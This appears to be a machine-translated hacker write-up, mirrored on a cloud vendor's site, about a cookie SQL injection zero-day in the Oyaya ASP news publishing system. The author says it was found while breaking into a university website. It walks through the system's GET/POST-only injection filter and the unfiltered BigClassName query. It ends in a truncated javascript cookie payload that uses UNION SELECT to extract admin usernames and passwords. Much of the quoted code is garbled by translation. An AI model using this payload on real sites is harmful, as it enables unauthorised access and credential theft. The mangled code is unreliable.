Concave Margin Analysis

Last Update:2013-11-21 Source: Internet

Author: User

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Hacknote

When I infiltrated a local university website last night, I found a sub-station that used the concave-Ya news publishing system. At that time, I found no vulnerabilities in this system on the Internet, so I made a set of 4.7ACC to study it. After more than half an hour of research, I finally found two Injection Vulnerabilities. Later I remembered that I had published the 0-day version of the system on the black bar, but they were all old versions, or some are not very practical at all. At that time, it was estimated that some people had discovered the vulnerabilities in this system for a long time, but no one had discovered them. Just imagine the obvious vulnerabilities that could not be seen by the experts. When I find the vulnerability, I will release it and analyze the vulnerability code in detail.
Cookie injection is the main vulnerability in the system. There are two main vulnerabilities. Let's take a look at the anti-injection code:
<%
Dim Query_Badword, Form_Badword, I, Err_Message, Err_Web, name
------ Define some headers ----------------------------------------------------------------------
Err_Message = 1 Processing Method: 1 = prompt information, 2 = Turn to page, 3 = Prompt before turning
Err_Web = "Err. Asp" page to be switched when an error occurs
Err_Web = "http://www.oyaya.net" page to be redirected when an error occurs
Query_Badword = "either or both and between select between update into chr between delete rows % 20from rows; before insert into mid outer master. When set between chr (37) rows ="
In this section, an invalid get parameter is defined, and the "interval" is used.
Form_Badword = "" in this section, the post parameter is defined as an invalid parameter, and the "interval" is used.
Form_Badword = "percent % Percent & percent * percent # percent = percent or" in this section, the post parameter is defined as invalid, and the "percent" interval is used.
------ Define part of the end -----------------------------------------------------------------------

On Error Resume Next
----- Filter the get query value.
If request. QueryString <> "then
Chk_badword = split (Query_Badword, "Baidu ")
For each Query_Name IN Request. QueryString
For I = 0 to ubound (Chk_badword)
If Instr (LCase (request. QueryString (Query_Name), Chk_badword (I) <> 0 Then
Select Case Err_Message
Case "1"
Response. Write "<Script Language = JavaScript> alert (parameter passing error! The value of the parameter "& name &" contains an invalid string! Do not include invalid characters such as: and update delete; insert mid master in the parameter !); Window. close (); </Script>"
Case "2"
Response. Write "<Script Language = JavaScript> location. href =" & Err_Web & "</Script>"
Case "3"
Response. Write "<Script Language = JavaScript> alert (parameter passing error! The value of the parameter "& name &" contains an invalid string! Do not include invalid characters such as: and update delete; insert mid master in the parameter !); Location. href = "& Err_Web &"; </Script>"
End Select
Response. End
End If
NEXT
NEXT
End if
----- Filter the single value of the post table.
If request. form <> "" then
Chk_badword = split (Form_Badword, "Baidu ")
For each name IN Request. Form
For I = 0 to ubound (Chk_badword)
If Instr (LCase (request. form (name), Chk_badword (I) <> 0 Then
Select Case Err_Message
Case "1"
Response. Write "<Script Language = JavaScript> alert (error! The value of Form "& name &" contains an invalid string! Please do not include illegal characters such as % & * # () in the form !); Window. close (); </Script>"
Case "2"
Response. Write "<Script Language = JavaScript> location. href =" & Err_Web & "</Script>"
Case "3"
Response. Write "<Script Language = JavaScript> alert (error! The value of the parameter "& name &" contains an invalid string! Please do not include illegal characters such as % & * # () in the form !); Location. href = "& Err_Web &"; </Script>"
End Select
Response. End
End If
NEXT
NEXT
End if
%> The general anti-injection system obviously performs GET and POST filtering. Here we have this, it is basically useless to directly inject the system, however, the cookie is not filtered in this anti-injection program. We only need to find the location where the request ("xx") method is used to obtain the variable and bring the variable into the code in the SQL query statement, after careful searching, we found two locations: Download. asp file.
Download. an asp file is a list file that shows all downloads. The detailed information of the list is to use the call ShowDown (32) code to call the Include/SysDown file. the ShowDown function in asp. Let's take a look at Include/SysDown. asp file and ShowDown function code.

<%
Dim strFileName, MaxPerPage, ShowSmallClassType
......
BeginTime = Timer
BigClassName = Trim (request ("BigClassName "))
SmallClassName = Trim (request ("SmallClassName "))
Keyword = trim (request ("keyword "))
If keyword <> "" then
Keyword = replace (keyword, "", "'"), "<", "<"), ">", "> "), "","")
End if
StrField = trim (request ("Field "))
......
%>

The above code can be seen at the beginning of the Include/SysDown. asp file. It is obvious that the values of BigClassName and SmallClassName are obtained directly using the request method, without specifying the specific method of the request object. In terms of filtering, only the Trim function is used to filter out spaces on both sides. Now we need to find out where the BigClassName or SmallClassName value is directly imported into the SQL statement. Continue to see the ShowDown function, download. the list display function in the asp file. The Code is as follows:
Sub ShowDown (TitleLen)
............
If currentPage = 1 then
SqlDown = "select top" & MaxPerPage
Else
SqlDown = "select"
End if
SqlDown = sqlDown & "ID, title, content, BigClassName, SmallClassName, System, Language, Softclass, PhotoUrl, DownloadUrl, FileSize, Hits, AddDate from download"

If BigClassName <> "then
SqlDown = sqlDown & "where BigClassName =" & BigClassName &""
If SmallClassName <> "then
SqlDown = sqlDown & "and SmallClassName =" & SmallClassName & "end if
End if
SqlDown = sqlDown & "order by AddDate desc"
Set rsDown = Server. CreateObject ("ADODB. Recordset ")
RsDown. open sqlDown, conn, 1, 1
If rsDown. bof and rsDown. eof then
Response. Write ("<br> <li> NO downloads </li> ")
Else
............
End sub directly queries the values of BigClassName and SmallClassName. Before that, there were no concerns about BigClassName and SmallClassName, therefore, we can use BigClassName to inject cookies.
Code: javascript: alert (document. cookie = "BigClassName =" + escape ("% 25 and 1 = 2 union select 1, admin, 3, password, 5, 6, 7, 8, 9, 10, 11, 12, 13 from admin wher

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

Concave Margin Analysis

Contact Us

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support